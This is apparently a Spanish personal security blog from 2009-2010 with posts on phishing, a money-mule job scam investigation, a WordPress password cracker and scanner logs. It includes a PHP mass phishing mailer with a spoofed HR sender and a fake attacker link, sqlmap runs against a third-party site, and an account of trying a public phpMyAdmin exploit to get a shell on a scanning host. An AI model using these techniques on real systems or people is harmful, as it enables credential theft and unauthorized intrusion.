2010
07.09

Crackear passwords de wordpress con wordlists

In Uncategorized

Me he encontrado con la necesidad de crackear unos passwords de wordpress con el sistema nuevo de hashing (ya no se utiliza MD5) y me he dado cuenta que no habia ninguna tool para ello :(

EDIT: Si que habia :D De hecho el codigo magicamente se parece en un 99%

Basicamente lo que hace es leer linea a linea el archivo wordlist.lst y va probando cada password contra el hash que tenemos (hay que insertarlo dentro del codigo)

Si alguien se aburre o quiere jugar con el:

www.madgoblin.net/bruteforcer.tar

0 comments
2010
06.25

Nuevo caso de phishing de Movistar

In Uncategorized

Se esta realizando una nueva campaña de phishing con el asunto “Promociones Movistar: Recarga ahora y duplicamos el importe!” El mail original me lo paso un compañero del curro (thx Joan) y tiene esta pinta.

Si se hace click en el mismo nos envia a una url un tanto sospechosa:

http://canalcliente-movistar.info/**********/CCLI_CW_publico/pub/0,4093_259_43408951_0_0.00/index.htm

Y aqui habilmente nos pediran los datos de la tarjeta, etc…

Todo esto seria perfecto para el tio que lo ha montado si no fuera porque es un “peliiiiinnn” chapucero :)

Si empiezas a trastear con la url te puedes encontrar lo siguiente:

¿¿¿logs.txt??? No… no sera tan cutre… pero no :( TAN TAN CUTRE NO ES, ya que esta vacio.. ohh que pena :(

PERO

Si entro en el directorio “0,4093_259_43408951_0_0.00″  me sale la pagina de phishing… ummm no… ese archivo de logs NO existira dentro del directorio… ¿verdad?

Lo dicho… tened cuidado ahi fuera :)

0 comments
2010
04.14

Mas phishing

In Uncategorized

¿Es muy complicado enviar emails de phishing de una forma automatica?

Pues va a ser que no :) De hecho el codigo que utilice para la auditoria interna es mas o menos este:

<?
$body = “<html><body><h1><a href=’http://www.ev1lh4cker.com/login.htm’><img
src=’http://www.ev1lh4cker.com/lolcat.jpg’ border=’0′ alt=’Click here for more lolcats’
></a></html>”;
echo $body;

$myFile = “listaemails.txt”;
$fh = fopen($myFile, ‘r’);
while (!feof($fh))
{
$theData = fgets($fh);
echo “Sending to: $theData \r\n”;

$smtp_server = fsockopen(“smtp.victim.com”, 25, $errno, $errstr,30);
if(!$smtp_server)
{
exit;
}
fwrite($smtp_server, “HELO its_me\r\n”);
echo fgets($smtp_server);
fwrite($smtp_server, “MAIL FROM:<RRHH@victim.com>\r\n”);
echo fgets($smtp_server);
fwrite($smtp_server, “RCPT TO:”. $theData . “\r\n”);
echo fgets($smtp_server);
fwrite($smtp_server, “From: manolo <manolo@victim.com>\r\n”);
fwrite($smtp_server, “To: FlowerpowerUser <flower@victim.com>\r\n”);
fwrite($smtp_server, “Subject: Funny lolcat picture \r\n”);
fwrite($smtp_server, “Mime-Version: 1.0;\r\n”);
fwrite($smtp_server, “Content-Type: text/html;charset=ISO-8859-1;\r\n”);
fwrite($smtp_server, “Content-Transfer-Encoding: 7bit;\r\n”);
fwrite($smtp_server, “\r\n”);
fwrite($smtp_server, “$body\r\n”);
fwrite($smtp_server, “.\r\n”);
fwrite($smtp_server, “.\r\n”);
echo “———\r\n”;
}
fclose($fh);
?>

A este codigo le faltan algunas lineas, asi que NO funciona a menos que sepais del tema, en cuyo caso no necesitareis utilizarlo de todas formas :D

Hasta esta mañana creia que todo este mundillo del phishing era una perdida de tiempo. Como mucho funcionaba con un1% de la gente a la quien se lo enviabas…. pero estaba equivocado. :(

Algunos datos interesantes que puedo explicar:

  • Exito de un 23% de los emails enviados
  • Se tardo unos 3 minutos en que alguien avisara a los responsables de seguridad
  • Se tardo 20 minutos en que alguien enviara un email a toda la empresa avisando del ataque
  • Un 50% de la gente hizo click en el email que habian recibido
  • Contra lo que yo me esperaba, habia gente de todos los departamentos
0 comments
2010
04.14

Concienciacion sobre phishing.

In Uncategorized

En departamento de seguridad del trabajo hemos decidido hacer una serie de acciones de concienciacion para que los usuarios sepan “que hay ahi afuera”.

La primera que tenemos en mente (quiza por lo facil o lo divertida que puede ser) sera explicar en que consiste el phishing, formas de detectarlo, razones por las que se hace, etc… Pero antes de hacerlo, que mejor que efectuar un envio de mails a toda la empresa para intentar conseguir las credenciales de la gente. Dependiendo de los resultados podremos ver  antes de la formacion, el nivel de conocimientos de la gente y, si “cuela” el nivel de fortaleza de contraseñas que utilizan (que sera la siguiente formación en teoria)

Lo primero ha sido comentar el tema a direccion… Sin soporte de ellos nos podemos meter en un follon bastante gordo, pero por suerte les ha gustado la idea :) Primer tema OK

Lo segundo, comentarlo con el departamento legal. ¿why? Ya que vamos a guardar los nombres de usuarios y contraseñas de la gente sin su consentimiento, muy legal no era el tema ;) Por lo visto mientras no guardemos ningun tipo de relacion entre usuario-password estamos cubiertos. Tambien (por logica) se nos pide que avisemos a las “victimas” para que cambien su password una vez haya acabado el experimento.

Teniendo los OK’s necesarios, ahora solo nos queda por delante los temillas tecnicos de como c**o hacerlo :) Tenemos los conocimientos pero no hemos hecho estos temas “en serio” jamas jejejeje

El plan por el momento sera enviar un email que incite a hacer click en un link, y una vez en una pagina web hacer que el usuario escriba de alguna forma su usario y su password.

Registro el dominio “fake” del tipo www.NombreDeLaEmpresa.net.madgoblin.net …. ¿porque un subdominio en vez de un dominio directamente? Por dos razones: La primera es que queremos que los usuarios tengan alguna posibilidad de darse cuenta. La segunda, por que es muuuucho mas rapido y barato registrar un subdominio en los DNS, que tener que pedir presupuesto a la empresa para comprar un dominio :D .

1 comment
2010
03.03

Ofertas de trabajo falsas

In Uncategorized

En el trabajo nos hemos encontrado con unas campañas de phishing utilizando nuestra imagen. Despues de una pequeña investigacion he hecho el siguiente “informe” para el resto de la empresa… de todas formas creo conveniente que el resto de gente este informada :)

——————- PASTE FROM EMAIL—————–

Version corta:

Como dije anteriormente, lo que esta sucediendo es una campaña para fichar gente que ayude a blanquear dinero.

La metodología es la siguiente:

1.- Una persona (desde ahora victima) recibe un correo con una oferta de trabajo.

2.- Dicha oferta contiene un email en su interior (cv@empleosupport.net, support@empleosupport.net, espana@es-tr.net , info@es-tr.net y info@espempleo.net )

3.- En el momento que establece contacto, se le propone a la victima el trabajo de “agente financiero”. Dicho empleo consiste en recibir cantidades de dinero de “clientes” en su cuenta de banco y reenviarlo utilizando western union o similar a la “sede central” en otro país quedándose antes un porcentaje como “comisión”

4.- La policía cuando sigue el rastro del dinero, llegara a la victima y se la declarara culpable de estafa. Dado que el envío del dinero sera a un destino “falso” se pierde la pista del dinero.

Version larga:

Hemos recibido por diversas fuentes, 3 emails falsos con apariencia de bolsas de empleo (Infojobs y monster por el momento).

Fuente: Candidato avisando del email que ha recibido

———- Mensaje reenviado ———-
De: Balfour TITTLE <bBalfour6TITTLEF@hotmail.com>
Fecha: 1 de marzo de 2010 18:51
Asunto: OFERTA DE EMPLEO
Para:CENSORED

¡Error! Nombre de archivo no especificado.

Lunes 1 de marzo 2010

Juan Martinez te envía una oferta de empleo

Buenas tardes,
En primer lugar permitame que me presente, soy Antonio Lacerdon, responsable de recursos humanos  de la compania ORO PLATA, nuestra empresa es una de las mayores companias de  almacenamiento  y exportacion de oro, plata y metales preciosos, con base en Inglaterra y filiales en todo el Mundo.
Nuestro departamento de seleccion de personal, conoce de su interes en un puesto de trabajo estable, informacion que hemos podido observar en alguno de los portales mas importantes para la busqueda de empleo en Espana.
Somos uno de los principales distribuidores en Espana y Portugal de Oro de inversion, exento de IVA, procedente de Suiza. Compra y venta a particulares y empresas.
Ofrecemos metales preciosos, traidos directamente de la cantera suiza PAMP SA, a precios actuales de mercado.
Comercializamos un amplio surtido de lingotes de oro, plata, platino y paladio desde 2,5 gramos hasta 1000 gramos/1 kg de peso. Tambien disponemos de una gran variedad en monedas como el Krugerrand, la Filarmonica de Viena, el Maple Leaf y el Australian Nugget todas de una onza.
Nuestros clientes son clientes anonimos que desean invertir en metales preciosos porque consideran que es la mejor inversion en estos momentos. Nuestra compania se ocupa de toda la gestion de compra importacion y busqueda de las mejores oportunidades para nuestros clientes.
En estos momentos disponemos de varias vacantes para trabajar en su pais.
Necesitamos con urgencia agentes financieros que puedan realizar transacciones bancarias diarias para nuestros clientes, trabajando como intermediario entre el cliente y el vendedor.
Quisieramos contar con usted en nuestro proceso de seleccion, en este trabajo que podra desempenar a distancia desde cualquier punto del territorio Espanol, pero para poder entrar en el proceso de seleccion inmediato, es imprescindible que usted nos haga llegar lo mas rapidamente posible su CV, actualizado a la direccion de correo electronico siguiente:

cv@empleosupport.net
una vez recibido su CV, uno de nuestros responsables de seleccion se pondra en contacto con usted para informarle de los requisitos y oportunidades que se adapten a su perfil, asi como toda la informacion respecto a nuestra compania.
Nuestras plazas vacantes son limitadas, le rogamos sea usted rapido en el envio de su curriculum.
Atentamente.
Antonio Lacerdon
Responsable del proceso de seleccion de personal
ORO PLATA COMPANY

En cumplimiento de la normativa vigente en materia de Servicios de la Sociedad de la Informacion y de Comercio Electronico y de Proteccion de Datos de Caracter Personal, te informamos que puedes revocar en cualquier momento, de forma sencilla y gratuita, el consentimiento para la recepción de mensajes promocionales de InfoJobs.net, dando de baja tus suscripciones o bien dándote de baja del servicio de Infojobs.net a traves del Menu privado. Por favor no respondas a este e-mail directamente.

INFOJOBS, S.A. CIF: A-62134309. Domicilio social en C/ Numancia 46. 08029 Barcelona.

Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.

Foro hablando sobre el email con skin de monster

Fuente: http://camyna.com/2010/02/12/oferta-de-trabajo-falsa/

Hay un correo que llega aparentando ser de Monster y que es una oferta falsa de trabajo.

El correo dice asi:

Buenas tardes,

Nuestro departamento de recursos humanos ha podido averiguar su interes en un puesto de trabajo
estable a traves de uno de los portales mas importantes de internet para busqueda de empleo.
En primer lugar permitame que me presente, soy JUAN CARLOS FERRER, responsable del departamento de
recursos humanos de una gran compania de importacion, almacenamiento y exportacion de oro, plata
y metales preciosos, con base en Inglaterra y filiales en todo el Mundo. Somos uno de los
principales distribuidores en Espana y Portugal de Oro de inversion, exento de IVA,
procedente de Suiza. Compra y venta a particulares y empresas. Ofrecemos metales preciosos,
traidos directamente de la refineria suiza PAMP SA, a precios actuales de mercado. Los precios
de venta son actualizados en sintonia con la cotizacion del Mercado de Londres.
Comercializamos un amplio surtido de lingotes de oro, plata, platino y paladio desde 2,5
gramos hasta 1000 gramos/1 kg de peso. Tambien disponemos de una gran variedad en monedas
como el Krugerrand, la Filarmonica de Viena, el Maple Leaf y el Australian Nugget todas de una onza.
Nuestros clientes son clientes anonimos que desean invertir en metales preciosos porque
consideran que es la mejor inversion en estos momentos. Nuestra compania se ocupa de toda la
gestion de compra importacion y busqueda de las mejores oportunidades para nuestros clientes.
En estos momentos disponemos de varias vacantes en una de las mas grandes companias que se ocupa
de realizar la gestion que le hemos explicado anteriormente.
Tenemos varios puestos de agentes financieros cuyas funciones son realizar transacciones bancarias
diarias para nuestros clientes, trabajando como intermediario entre el cliente y el vendedor.
Quisieramos contar con usted en el proceso de seleccion, este trabajo Ud podra desempenarlo a
distancia desde cualquier punto del territorio Espanol, pero para poder entrar en el proceso de
seleccion inmediatamente, es imprescindible que usted nos haga llegar lo mas rapidamente posible
su CV, actualizado a la direccion de correo electronico siguiente:

info@espempleo.net

al recibir su CV, uno de nuestros responsables de seleccion se pondra
en contacto con usted para informarle de los requisitos y oportunidades que se adapten a su perfil.

Le agradecemos su atencion y esperamos contar con usted en muy breve espacio de tiempo.
JUAN CARLOS FERRER
Responsable del proceso de seleccion de personal

Viene con los logotipos de Monster, e incluso con un pie de correo, con todos los datos aperentemente de ese portal de empleo. Sin embargo, tanto el texto, como la dirección de correo son sospechosos.
De: Irma GARRIGA <icIrmaP9GARRIGA@hotmail.com>
Fecha: 1 de marzo de 2010 19:23
Asunto: BUSCAMOS PROFESIONALES CON TOTAL DEDICACION
Para:CENSORED

Lunes 1 de marzo 2010

Juan Martinez te envía una oferta de empleo

Buenas tardes,
En primer lugar permitame que me presente, soy Antonio Lacerdon, responsable de recursos humanos  de la compania ORO PLATA, nuestra empresa es una de las mayores companias de  almacenamiento  y exportacion de oro, plata y metales preciosos, con base en Inglaterra y filiales en todo el Mundo.
Nuestro departamento de seleccion de personal, conoce de su interes en un puesto de trabajo estable, informacion que hemos podido observar en alguno de los portales mas importantes para la busqueda de empleo en Espana.
Somos uno de los principales distribuidores en Espana y Portugal de Oro de inversion, exento de IVA, procedente de Suiza. Compra y venta a particulares y empresas.
Ofrecemos metales preciosos, traidos directamente de la cantera suiza PAMP SA, a precios actuales de mercado.
Comercializamos un amplio surtido de lingotes de oro, plata, platino y paladio desde 2,5 gramos hasta 1000 gramos/1 kg de peso. Tambien disponemos de una gran variedad en monedas como el Krugerrand, la Filarmonica de Viena, el Maple Leaf y el Australian Nugget todas de una onza.
Nuestros clientes son clientes anonimos que desean invertir en metales preciosos porque consideran que es la mejor inversion en estos momentos. Nuestra compania se ocupa de toda la gestion de compra importacion y busqueda de las mejores oportunidades para nuestros clientes.
En estos momentos disponemos de varias vacantes para trabajar en su pais.
Necesitamos con urgencia agentes financieros que puedan realizar transacciones bancarias diarias para nuestros clientes, trabajando como intermediario entre el cliente y el vendedor.
Quisieramos contar con usted en nuestro proceso de seleccion, en este trabajo que podra desempenar a distancia desde cualquier punto del territorio Espanol, pero para poder entrar en el proceso de seleccion inmediato, es imprescindible que usted nos haga llegar lo mas rapidamente posible su CV, actualizado a la direccion de correo electronico siguiente:

espana@es-tr.net
una vez recibido su CV, uno de nuestros responsables de seleccion se pondra en contacto con usted para informarle de los requisitos y oportunidades que se adapten a su perfil, asi como toda la informacion respecto a nuestra compania.
Nuestras plazas vacantes son limitadas, le rogamos sea usted rapido en el envio de su curriculum.
Atentamente.
Antonio Lacerdon
Responsable del proceso de seleccion de personal
ORO PLATA COMPANY

En cumplimiento de la normativa vigente en materia de Servicios de la Sociedad de la Informacion y de Comercio Electronico y de Proteccion de Datos de Caracter Personal, te informamos que puedes revocar en cualquier momento, de forma sencilla y gratuita, el consentimiento para la recepción de mensajes promocionales de InfoJobs.net, dando de baja tus suscripciones o bien dándote de baja del servicio de Infojobs.net a traves del Menu privado. Por favor no respondas a este e-mail directamente.

INFOJOBS, S.A. CIF: A-62134309. Domicilio social en C/ Numancia 46. 08029 Barcelona.
De: stanleyhdisidoroz@hotmail.com [mailto:stanleyhdisidoroz@hotmail.com]
Enviado el: lunes, 01 de marzo de 2010 19:26
Para: CENSORED
Asunto: OFERTA DE EMPLEO

Lunes 1 de marzo 2010

Juan Martinez te envía una oferta de empleo

Buenas tardes,
En primer lugar permitame que me presente, soy Antonio Lacerdon, responsable de recursos humanos  de la compania ORO PLATA, nuestra empresa es una de las mayores companias de  almacenamiento  y exportacion de oro, plata y metales preciosos, con base en Inglaterra y filiales en todo el Mundo.
Nuestro departamento de seleccion de personal, conoce de su interes en un puesto de trabajo estable, informacion que hemos podido observar en alguno de los portales mas importantes para la busqueda de empleo en Espana.
Somos uno de los principales distribuidores en Espana y Portugal de Oro de inversion, exento de IVA, procedente de Suiza. Compra y venta a particulares y empresas.
Ofrecemos metales preciosos, traidos directamente de la cantera suiza PAMP SA, a precios actuales de mercado.
Comercializamos un amplio surtido de lingotes de oro, plata, platino y paladio desde 2,5 gramos hasta 1000 gramos/1 kg de peso. Tambien disponemos de una gran variedad en monedas como el Krugerrand, la Filarmonica de Viena, el Maple Leaf y el Australian Nugget todas de una onza.
Nuestros clientes son clientes anonimos que desean invertir en metales preciosos porque consideran que es la mejor inversion en estos momentos. Nuestra compania se ocupa de toda la gestion de compra importacion y busqueda de las mejores oportunidades para nuestros clientes.
En estos momentos disponemos de varias vacantes para trabajar en su pais.
Necesitamos con urgencia agentes financieros que puedan realizar transacciones bancarias diarias para nuestros clientes, trabajando como intermediario entre el cliente y el vendedor.
Quisieramos contar con usted en nuestro proceso de seleccion, en este trabajo que podra desempenar a distancia desde cualquier punto del territorio Espanol, pero para poder entrar en el proceso de seleccion inmediato, es imprescindible que usted nos haga llegar lo mas rapidamente posible su CV, actualizado a la direccion de correo electronico siguiente:

support@empleosupport.net
una vez recibido su CV, uno de nuestros responsables de seleccion se pondra en contacto con usted para informarle de los requisitos y oportunidades que se adapten a su perfil, asi como toda la informacion respecto a nuestra compania.
Nuestras plazas vacantes son limitadas, le rogamos sea usted rapido en el envio de su curriculum.
Atentamente.
Antonio Lacerdon
Responsable del proceso de seleccion de personal
ORO PLATA COMPANY

En cumplimiento de la normativa vigente en materia de Servicios de la Sociedad de la Informacion y de Comercio Electronico y de Proteccion de Datos de Caracter Personal, te informamos que puedes revocar en cualquier momento, de forma sencilla y gratuita, el consentimiento para la recepción de mensajes promocionales de InfoJobs.net, dando de baja tus suscripciones o bien dándote de baja del servicio de Infojobs.net a traves del Menu privado. Por favor no respondas a este e-mail directamente.

INFOJOBS, S.A. CIF: A-62134309. Domicilio social en C/ Numancia 46. 08029 Barcelona.
Cabeceras del email

Return-Path: <stanleyhdisidoroz@hotmail.com>

Received: from IMPmx10.adm.correo (10.20.102.117)

by tems5.backend.correo (8.5.113)

id 4B7CC227006CAD60 for CENSORED; Mon, 01 Mar 2010 19:26:28 +0100

Received: from blu0-omc2-s26.blu0.hotmail.com ([65.55.111.101])

by IMPmx10.adm.correo with BIZ IMP    id nuSS1d00Z2BJekH0AuSSK6; Mon,

01 Mar 2010 19:26:27 +0100

Received: from BLU142-W21 ([65.55.111.73]) by blu0-omc2-s26.blu0.hotmail.com

with Microsoft SMTPSVC(6.0.3790.3959); Mon, 01 Mar 2010 10:26:25 -0800

Date: Mon, 1 Mar 2010 20:26:26 +0200

From: Stanley ISIDORO <StanleyHdISIDOROZ@hotmail.com>

Subject: OFERTA DE EMPLEO

X-Originating-IP: [201.37.198.16]

Sender: stanleyhdisidoroz@hotmail.com

To:CENSORED

Message-ID: <BLU142-W21E88A1B063A554C7A3E16A43C0@phx.gbl>

X-UID:

MIME-Version: 1.0

Content-Type: multipart/alternative;

boundary=”Boundary_(ID_R1dIzlzZEdcz0W/vQcOUWA)”

Importance: Normal

X-Bogosity: Unsure, tests=bogofilter, spamicity=0.520000, version=1.2.0

X-OriginalArrivalTime: 01 Mar 2010 18:26:25.0952 (UTC)

FILETIME=[B3E9A200:01CAB96C]

Apartir de estos emails podemos extraer la siguiente información:

IPs de origen de uno de los emails:

201.37.198.16  (owner: NET Serviços de Comunicação S.A.. – responsible: Grupo de Segurança da Informação Vírtua – country:BR)

Dominios que aparecen en las direcciones de email a las que hay que responder:

Empleosupport.net

Espempleo.net

Es-tr.net

La direccion IP del unico email del que disponemos las cabeceras la podemos encontrar en 4 blacklists de spammers conocidos.

http://www.mxtoolbox.com/SuperTool.aspx?action=blacklist%3a201.37.198.16

Los dominios son una copia levemente modificada de un portal de empleo de Navarra. Dichos dominios han sido registrados en china el dia 25/2/2010 por la misma “persona” (seguramente falsa)

Domain Name………. empleosupport.net

Creation Date…….. 2010-02-25 12:16:55

Registration Date…. 2010-02-25 12:16:55

Expiry Date………. 2011-02-25 12:16:55

Organisation Name…. zhang hai yun

Organisation Address. chongqingshinanxialu123hao

Organisation Address.

Organisation Address. chongqing

Organisation Address. 021221

Organisation Address. CQ

Organisation Address. CN
Domain Name………. es-tr.net

Creation Date…….. 2010-02-25 12:20:46

Registration Date…. 2010-02-25 12:20:46

Expiry Date………. 2011-02-25 12:20:46

Organisation Name…. zhang hai yun

Organisation Address. chongqingshinanxialu123hao

Organisation Address.

Organisation Address. chongqing

Organisation Address. 021221

Organisation Address. CQ

Organisation Address. CN

Pagina Original

Sitios fraudulentos


Los dominios ofertas-laborales.com y espempleo.net ya no existen, pero atraves de la cache de Google se puede ver aun el contenido.

Resalto las paginas identicas entre dominios.

Estos dominios apuntan todos a una misma direccion IP (112.159.237.58) en la cual hay los siguientes dominios identificados a dia de hoy.

*.boxingeatingshare.cn

*.cashsmart.cn

*.es-tr.net

*.gamingeurocasino.net

*.play777vegas.net

backstorypalmlaws.cn

boxingeatingshare.cn

gamingeurocasino.net

manicash.net

ns1.boxingeatingshare.cn

ns1.gamingeurocasino.net

ns1.manicash.net

ns1.play777vegas.net

ns2.boxingeatingshare.cn

ns2.gamingeurocasino.net

ns2.manicash.net

ns2.play777vegas.net

ns3.boxingeatingshare.cn

ns3.gamingeurocasino.net

ns3.manicash.net

ns3.play777vegas.net

ns4.boxingeatingshare.cn

ns4.gamingeurocasino.net

ns4.manicash.net

ns4.play777vegas.net

play777vegas.net

www.backstorypalmlaws.cn

www.boxingeatingshare.cn

www.es-tr.net

www.gamingeurocasino.net

www.play777vegas.net

Se trata de paginas de casinos online que intentan infectar el ordenador de quien juegue, con troyanos bancarios, etc…

Resultados de dicho ejecutable enviado a virustotal

En la pagina del investigador Dancho Danchev hay un analisis de estos dominios (y mas) que forman esta red de estafas.

http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html

Mi conclusion es que esta campaña se esta llevando a cabo para conseguir victimas que blanqueen el dinero obtenido a partir de las paginas de casinos online.

4 comments
2010
02.24

Adquisicion de informacion para n00bs

In paros proxy ,penetration testing ,sql ,sql injection

Por alguna extraña razon, este post esta marcado como draft… ¿se habra perdido en la migracion? Sea como sea, lo publico aunque sea de… oh dios mio… del 2007??? y ya hacia estas cosas yo???

—————————–

Herramientas:
Paros Proxy
Sqlmap
Tiempo:15 minutos (Por alguna extraña razon la version 5 de sqlmap no queria ir en mi mac, asi que al final use la 4)

Paros

Sqlmap

./sqlmap.py --url="http://www.*******.info/index.php?id=fviewid&v=6" -b

sqlmap/0.4 coded by inquis
and belch

[*] starting at: 13:23:13
[13:33:40] [WARNING] parameter ‘id’ is not injectable
remote DBMS: MySQL < 5.0.0
banner: ’4.1.22-standard-log’
[*] shutting down at: 13:25:39

./sqlmap.py –url=”http://www.*******.info/index.php?id=fviewid&v=6″ –current-user –current-db

sqlmap/0.4 coded by inquis
and belch

[*] starting at: 13:33:34
[13:23:19] [WARNING] parameter ‘id’ is not injectable
remote DBMS: MySQL < 5.0.0
current user: ‘sO2a846O_*******@localhost’
current database: ‘sO2a846O_*******’
[*] shutting down at: 13:34:52

Si usara una version de MySql mas moderna se podria conseguir sin mucha dificultad una lista de users + hashes de passwords entre otras cosas :)
A ver si un dia aprendo a hacer lo mismo en versiones mas antiguas del mysql que aun corren por ahi.

(^o^)

1 comment
2010
02.16

Miniproyectos flotantes

In Uncategorized

Ya llevo unos dias teniendo ganas de escribir de nuevo, pero realmente no se me ocurria sobre QUE escribir… asi que voy a poner simplemente los miniproyectos que creo que podrian estar bien hacerse para, como minimo, recordarlos :)

Google Buzz Stalker

Programita que capture los movimientos que efectua un usuario a lo largo del tiempo para poder extraer patrones.

Google Maps Image Generator

Un sistema simple para poder grabar una imagen G-R-A-N-D-E de una zona del mapa. Se podrian hacer posters A3 o A2 de un barrio o que se yo. :D

0 comments
2009
07.22

"M Fucking Scanner" , o como un hacker puede ser subnormal

In Uncategorized

Esto es el colmo… mirando mi access.log del apache me he encontrado con lo siguiente:

204.***.***.*** – - [22/Jul/2009:10:01:18 +0200] “GET /phpmyadmin/INSTALL HTTP/1.1″ 404 216 “-” “M Fucking Scanner.”
204.***.***.*** – - [22/Jul/2009:10:01:18 +0200] “GET /myadmin/INSTALL HTTP/1.1″ 404 213 “-” “M Fucking Scanner.”
204.***.***.*** – - [22/Jul/2009:10:01:19 +0200] “GET /admin/INSTALL HTTP/1.1″ 404 211 “-” “M Fucking Scanner.”
204.***.***.*** – - [22/Jul/2009:10:01:19 +0200] “GET /phpMyAdmin/INSTALL HTTP/1.1″ 404 216 “-” “M Fucking Scanner.”

Ya tengo muy vistos los scanners que buscan phpmyadmins o similares y como que ya paso, pero este en especial me ha tocado la moral. ¿Si haces algo, hazlo bien no? Que es ese useragent tan CUTRE? ¿Se piensa que es el IMBA HAXXOR OF DA DEATH?

Lo primero que he hecho es ver “que tiene” con un nmap

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_ html-title: Apache HTTP Server Test Page powered by CentOS
1863/tcp open msnp?
5190/tcp open aol?

Ummm al abrir la direccion con un browser aparece la pagina por defecto de apache, asi que, una vez mas, han rebentado un novatillo que no securiza su sistema.
Que pasara si pongo /phpmyadmin/ ?


Al abrir la pagina de “No te sabes el login y mereces morir” pude ver la version que era (realmente antigua) y hice la visita standard a milw0rm:

http://www.milw0rm.com/exploits/8992

Este exploit parece que deberia de ir… ¿el haXX0r novato habra modificado el codigo? Me jugaria alguna parte de mi cuerpo a que no. Veamos que hace el exploit… 

 FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here"); FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");

¿Sera posible?¿Funcionara?


Ahora se me presentan un par de dudas existenciales:

¿Deberia de avisar al propietario y de que forma?
¿Seria etico que, cuando se detectan escaneos de este tipo, utilizar los exploits publicos para “rehackear” la maquina atacante y “limpiarla”?

1 comment
2009
07.10

Psicologia – Hacking

In Uncategorized

Lenguaje corporal – Nmap
PNL – Exploits
Anclajes – Troyanos

Despues de unos dias hackeando “wetware” empiezo a sentir lo que senti en su dia al leer los primeros textos sobre las bluebox, telnets y similares. La emocion de modificar creaciones de otros y ver como hace lo que TU quieres. La seguridad de saber como funciona esa masa de materia gris y predecir sus actos…

0 comments
2008
06.02

Paranoia en los aviones…

In Uncategorized

Acabo de leer una noticia bastante curiosa:

EU project scans air passengers for terrorist tendencies
“An EU aviation safety project is testing a camera-based passenger surveillance system intended to spot terrorists poised to rush the cockpit.”
“Each camera tracks passengers’ facial expressions, with the footage then analysed by software to detect developing terrorist activity or potential air rage.”

No estoy seguro pero, diria que me es familiar… como si hace un tiempo hubiera visto una peli con algo parecido… Minority Report

En ella, la policia utiliza unos humanos psiquicos para poder predecir cuando alguien “teoricamente” va a cometer un crimen. El problema que tenemos aqui es que estas juzgando a alguien antes de que haga nada.

Imaginemos que viajo con una persona y discuto con ella durante el vuelo por una causa random… ¿soy un terrorista por tener la cara de asesino en ese momento? ¿No se supone que somos inocentes hasta que se demuestre lo contrario?

Welcome 1984.

0 comments